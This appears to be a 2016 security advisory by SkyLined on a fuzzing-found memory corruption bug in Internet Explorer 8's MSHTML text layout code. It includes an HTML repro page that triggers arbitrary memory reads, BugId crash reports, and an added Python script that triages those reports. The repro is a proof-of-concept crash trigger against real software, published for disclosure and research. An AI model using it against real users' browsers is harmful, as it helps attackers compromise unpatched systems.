November 21st, 2016

MSIE 8 MSHTML Ptls5::LsFindSpanVisualBoundaries memory corruption

(The fix and CVE number for this bug are unknown)

Synopsis

A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::LsFindSpanVisualBoundaries method (or other methods called by it) to access arbitrary memory.

Known affected software, attack vectors and mitigations

  • Microsoft Internet Explorer 8

    An attacker would need to get a target user to open a specially crafted web-page. JavaScript is not necessarily required to trigger the issue.

Description

The memory corruption causes the Ptls5::LsFindSpanVisualBoundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.

Repro.html

    <!DOCTYPE html>
    <html xmlns="http://www.w3.org/1999/xhtml">
      <body>
        <button>
          <pre>
            <x>
              <sub>
                <ruby>
                  <img height="1"/>
                </ruby>
              </sub>
            </x>
          </pre>
        </button>
      </body>
    </html>

Time-line

  • July 2014: This vulnerability was found through fuzzing.
  • November 2016: Details of this issue are released.

BugId report: mshtml.dll!Ptls5::LsFindListDu Arbitrary~021 AVR(67C1FF4C)

id:             mshtml.dll!Ptls5::LsFindListDu Arbitrary~021 AVR(67C1FF4C)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x000B2021) in mshtml.dll!Ptls5::LsFindListDu
note:           Based on this information, this is expected to be a security issue!

This report was generated using a predecessor of BugId, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try BugId out yourself today! You'll get even better reports than this one with the current version.

BugId report: mshtml.dll!Ptls5::LsFindSpanVisualBoundaries Arbitrary~0EE AVR(A2DF6722)

id:             mshtml.dll!Ptls5::LsFindSpanVisualBoundaries Arbitrary~0EE AVR(A2DF6722)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x000DA0EE) in mshtml.dll!Ptls5::LsFindSpanVisualBoundaries
note:           Based on this information, this is expected to be a security issue!

BugId report: mshtml.dll!Ptls5::LsFindSpanVisualBoundaries GuardPage(A2DF6722)

id:             mshtml.dll!Ptls5::LsFindSpanVisualBoundaries GuardPage(A2DF6722)
description:    Guard page violation in mshtml.dll!Ptls5::LsFindSpanVisualBoundaries
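
The Description's remark that the faulting addresses are often not DWORD aligned can be checked against the report summaries above. The following triage sketch is an added example, not part of the original advisory or of BugId: it parses the id/description lines copied from this page, treats the 8-digit hex value in parentheses as an opaque crash signature (an assumption), and uses the hypothetical names parse_reports and triage.

```python
import re
from collections import defaultdict

# Summary lines copied from the three reports on this page (soft hyphens removed).
REPORTS = """\
id: mshtml.dll!Ptls5::LsFindListDu Arbitrary~021 AVR(67C1FF4C)
description: Security: Attempt to read from unallocated arbitrary memory (@0x000B2021) in mshtml.dll!Ptls5::LsFindListDu
id: mshtml.dll!Ptls5::LsFindSpanVisualBoundaries Arbitrary~0EE AVR(A2DF6722)
description: Security: Attempt to read from unallocated arbitrary memory (@0x000DA0EE) in mshtml.dll!Ptls5::LsFindSpanVisualBoundaries
id: mshtml.dll!Ptls5::LsFindSpanVisualBoundaries GuardPage(A2DF6722)
description: Guard page violation in mshtml.dll!Ptls5::LsFindSpanVisualBoundaries
"""

ID_RE = re.compile(r"^id:\s+(\S+?)!(\S+)\s+(?:Arbitrary~([0-9A-F]+)\s+)?(\w+)\(([0-9A-F]{8})\)$")
ADDR_RE = re.compile(r"\(@0x([0-9A-Fa-f]+)\)")

def parse_reports(text):
    """Return one dict per report: module, function, kind, signature, address."""
    crashes = []
    for line in text.splitlines():
        line = line.replace("\u00ad", "")  # drop soft hyphens left by the HTML
        m = ID_RE.match(line)
        if m:
            module, func, suffix, kind, sig = m.groups()
            crashes.append({"module": module, "function": func, "kind": kind,
                            "signature": sig, "suffix": suffix, "address": None})
        elif line.startswith("description:") and crashes:
            a = ADDR_RE.search(line)
            if a:  # guard page reports carry no faulting address
                crashes[-1]["address"] = int(a.group(1), 16)
    return crashes

def triage(crashes):
    """Group by signature and flag faulting addresses that are not DWORD aligned."""
    groups = defaultdict(list)
    for c in crashes:
        addr = c["address"]
        c["dword_aligned"] = None if addr is None else addr % 4 == 0
        # Observed in these reports only: the ~XXX suffix equals the low 12 bits.
        c["suffix_matches"] = None if addr is None else f"{addr & 0xFFF:03X}" == c["suffix"]
        groups[c["signature"]].append(c)
    return dict(groups)

if __name__ == "__main__":
    for sig, items in triage(parse_reports(REPORTS)).items():
        for c in items:
            addr = "n/a" if c["address"] is None else f"0x{c['address']:08X}"
            print(sig, c["function"], c["kind"], addr, "aligned:", c["dword_aligned"])
```

Both read violations land on unaligned addresses, and the guard page violation shares signature A2DF6722 with the second read violation, so a triage queue would bucket them together.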
© Copyright 2017 by SkyLined. Last updated on August 19th, 2017. This work is licensed under a Creative Commons Attribution-Non-Commercial 4.0 International License.